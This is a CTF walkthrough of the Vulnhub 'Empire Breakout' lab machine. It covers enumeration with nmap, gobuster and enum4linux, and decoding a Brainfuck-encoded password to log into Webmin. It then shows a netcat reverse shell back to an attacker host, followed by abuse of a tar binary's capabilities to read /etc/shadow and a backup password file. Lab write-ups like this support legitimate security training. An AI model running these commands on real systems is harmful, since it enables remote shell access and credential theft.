Empire Breakout Vulnhub: WriteUp | Walkthrough | VulnHub CTF | Privilege Escalation Attack | Python Reverse Shell |Vulnerabilities
Hello, friends I’m Shams Ul Mehmood and this is my 3rd article. This article is a walkthrough of all about Empire Breakout Vulnhub Box. It includes some type of vulnerablities like Python Reverse Shell and User Privilege Escalation. You can find this Vulnhub box from here.
Steps:
- Getting the victim machine IP address by Netdiscover utility
- Getting open port details by using the Nmap tool
- Enumerating another HTTP ports 80, 10000, 20000
- Enumerating HTTP default Port with Gobuster utility
- Taking the Python reverse shell and user privilege escalation
Step#1:
📌️ In the first step of the scanning, I used the netdiscover -r commands to perform a Local Network Scan to find out the IP Address of the victim machine.
Command : sudo netdiscover -r 192.168.204.0/24
Step#2:
📌️ In the second step, after getting the target machine’s IP address now I performed a Nmap scan to my target. I utilized,
- -sVCS : to scan application version, default script and running services.
- -Pn : to skip host discovery scan
- -p- : to scan all ports on victim machine.
Command : sudo nmap -sVCS -Pn -p- 192.168.204.140
📌 ️This was an nmap scan of the network to find the IP address of the machine. I found that the IP address was 192.168.204.140, and I found that ports 80, 139, 445, 10000, and 20000 were open.
📌 ️ HTTP was running on the target machine on ports 80, 10000, and 20000. It was running Webmin, which is a web based admin tool for Unix.
📌️ Notably in my opinion, SSH on port 22 was not open. Along with that discover smb2-security-mode, smb2-time, netbios-state (BREAKOUT).
📌️ I then went to the web application to see if there was anything I could find. I was specifically looking for login pages or some kind of command line interface.
Step#3:
📌️ The first page I came across was a default Apache2 page. There was nothing notable on the page itself.
📌️ Now I viewed the page source code of Apache2 Debian Default Page and found an encrypted message there.
📌️ The message itself was pretty clear that the encrypted message was a password, however I did not recognize the encryption algorithm.
📌️ I wanted to look for some kind of login page and a username before I tried to decrypt the message.
📌️ Let’s check the identified open ports ( 10000, 20000 ) in search bar of my browser.
📌️ I visited the web application on port 10000, and I found a login page. I found the same login page when I visited on port 20000.
Step#4:
📌️ In this step, I used the gobuster tool to enumerate interesting hidden files and directories on this target machine.
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.140
📌️ So here I found some images and Apache HTTP Server documentation files.
📌️ The next thing I wanted to do was to see if I could enumerate the SMB that was open on the target machine.
📌️ SMB is Server Message Block, and is a file sharing protocol.
📌️ Enum4linux is a command line tool that can enumerate SMB.
Command : enum4linux 192.168.204.140
📌️ By using this command I found multiple things like list of usernames, password length for BREAKOUT domain and local user which is cyber. So at this point I had a username and an encrypted password.
📌️ Now we focus on decryption of encrypted password, for that I’m trying to get more information about encryption algorithm.
📌️ But finally I found out that the algorithm wasn’t actually an encryption algorithm, it was an esoteric programming language called Brainfuck.
📌️ An esoteric programming language is, from what I found, a programming language that is intentionally hard to understand.
📌️ I’m using decode.fr for the decryption of encrypted password and I got the required password.
📌️ I went back to 192.168.204.140:20000, entered the system user credentials into the system.
📌️ After login, I looked around the interface and under login option, I found a command shell. I found the my first flag by using following commands in terminal.
Command : whoami
Command : ls
Command : ls -la
Command : id
Command : cat user.txt
📌️ I used to create a reverse shell and I used nc on the attacker and victim command shell to connect to the listener. And I gave myself a bit more control by spawning a TTY Shell.
Command : nc -nlvkp 4444
Command : nc 192.168.204.137 4444 -e /bin/bash
📌️ After listening, you can see establish a connection between attacker and target machine.
Command : python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Command : whoami
Command : ls
Command : ls -a
📌️ To get to the root level access in order to get the second flag. I ran sudo -l to see what commands I would be able to run as the sudo user, but the sudo command was not found.
Command : sudo -l
📌️ Then I run the following command,
Command : find / -perm -u=s -type f 2>/dev/null
📌️ To see if there were any binaries that I could use, but that also did not give me much.
📌️ Then I want to list the all usernames in /etc/passwd file.
Command : ls /etc/passwd
Command : cat /etc/passwd
📌️Here I’m trying to show the all stored encrypted passwords in /etc/shadow file but I have no permission to show the all passwords because I have limited privilege.
📌️ In the home directory of cyber, there is a binary called ‘tar’. I ran ‘whereis tar’ to see if the tar command was on the machine. It was, and checking further, I found that the binary in the home directory is just the tar command.
Command : whereis tar
Command : file /usr/bin/tar
📌️ I used the following command on the binary to find out more information.
Command : getcap tar
Command : ./tar -cf shadow.tar /etc/shadow
Command : ls -a
Command : ./tar -xvf shadow.tar
📌️ I found that basically means I could use this to read any files. I first did this to try to get the /etc/shadow file. I wanted to try to crack the password using john the ripper. However, that didn’t work because no wordlist I had contained the password :( .
📌️ I decided to look around the machine to find something.
📌️ The next part took a long time, but I eventually found something in the /var/backups directory. There was a hidden file called old_pass.bak. I used the tar binary to get the contents of that file.
Command : ./tar -cf password.tar /var/backups/.old_pass.bak
Command : tar -xvf password.tar
Command : ls -a /var/backups/
Command : cat /var/backups/.old_pass.bak
Command : ls
Command : cd var
Command : ls -a ./backups/.old_pass.bak
📌️ Here I want to see the content of old_pass.bak file by using the following command.
Command : cat ./backups/.old_pass.bak
📌️ At this point I want to switch the user account from least privilege to highest privilege user account with the help of given command.
Command : su root
📌️ Then I wanna show user account name by using given command.
Command : whoami
📌️ Then I create and list a new directory or folder and show their files and directories with the help of below commands.
Command : mkdir cybershark
Command : ls
📌️ Then I want to determine the current working directory by using following command.
Command : pwd
📌️ Then I want to list all files and sub-directories in html directory.
Command : ls /var/www/html
📌️ Now I want to change the root directory of the root user with the help of below command.
Command : cd /root
📌️ I wanna display all files and sub-directories of the current directory by using given command.
Command : ls
📌️ And that was the root password. I used that to switch to root, went to the root directory, and got the final flag.
Command : cat rOOt.txt
Done….🚀🏆🎯💯🤩
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⠏⠀⠀⠀⠀⠀⠀⢀⣿⣿⡆⠀
⠀⠀⠀⠀⠀⢀⣠⢤⣶⣤⣤⣶⡿⠃⠀⠀⠿⠛⠋⠿⠀⠀
⠀⠀⠀⠀⣠⣿⠟⣾⣿⠋⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠛⠃⠐⠿⣿⣶⣦⣤⠀⠀⠀⠀⠀⢠⣶⣶⣶⣶
⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⢈⣿⡄⢰⣶⣶⣶⣾⣿⣿⣿⣿
⠀⠀⠀⠀⠀⢀⣾⡿⠁⣀⣀⣿⣁⣾⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⣙⣋⣀⣀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿